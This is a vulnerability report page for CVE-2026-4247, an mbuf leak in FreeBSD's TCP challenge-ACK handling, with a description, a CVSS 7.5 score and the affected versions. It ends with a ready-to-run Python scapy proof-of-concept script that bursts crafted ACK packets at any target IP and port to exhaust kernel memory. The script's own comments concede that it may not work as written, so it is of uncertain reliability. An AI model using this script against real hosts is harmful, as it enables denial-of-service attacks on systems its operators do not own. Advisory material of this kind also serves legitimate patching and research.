Security Vulnerability Report
CVE-2026-4247 CVSS 7.5 HIGH

Published: 2026-03-26 07:16:20
Last Modified: 2026-04-30 18:55:51

Description

When a challenge ACK is to be sent, tcp_respond() constructs and sends the challenge ACK and consumes the mbuf that is passed in. When no challenge ACK should be sent, the function returns and leaks the mbuf.

If an attacker is either on path with an established TCP connection, or can themselves establish a TCP connection, to an affected FreeBSD machine, they can easily craft and send packets which meet the challenge ACK criteria and cause the FreeBSD host to leak an mbuf for each crafted packet in excess of the configured rate limit settings, i.e. with default settings, crafted packets in excess of the first 5 sent within a 1s period will leak an mbuf.

Technically, off-path attackers can also exploit this problem by guessing the IP addresses, TCP port numbers and in some cases the sequence numbers of established connections and spoofing packets towards a FreeBSD machine, but this is harder to do effectively.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:freebsd:freebsd:14.3:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p4:*:*:*:*:*:* - VULNERABLE
FreeBSD (for the specific affected versions, see the FreeBSD-SA-26:06.tcp advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2026-4247 (FreeBSD TCP mbuf leak)
# This script sends crafted TCP packets to potentially trigger the mbuf leak.
# Usage: python3 poc.py <target_ip> <target_port>
import sys

from scapy.all import IP, TCP, send, RandShort


def trigger_mbuf_leak(target_ip, target_port):
    print(f"[*] Sending packets to {target_ip}:{target_port} ...")
    # Establish a connection first (simulated)
    # Here we assume a port is open or we are on-path.
    # We send a burst of packets with old sequence numbers to trigger Challenge ACK logic.
    src_port = RandShort()
    # Craft a packet with a sequence number likely out of window to provoke Challenge ACK
    # Note: Actual exploitation requires specific timing and sequence prediction.
    pkt = IP(dst=target_ip)/TCP(sport=src_port, dport=target_port, flags="A", seq=1000, ack=1000)
    # Send a burst to exceed rate limit (default 5/sec)
    for i in range(100):
        send(pkt, verbose=0)
        # Optional: slight delay to avoid immediate network blocking, but fast enough for burst
    print("[+] Attack packet burst sent.")
    print("[!] Monitor target memory usage (mbuf usage) for signs of leak.")


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python3 poc.py <target_ip> <target_port>")
        sys.exit(1)
    trigger_mbuf_leak(sys.argv[1], int(sys.argv[2]))
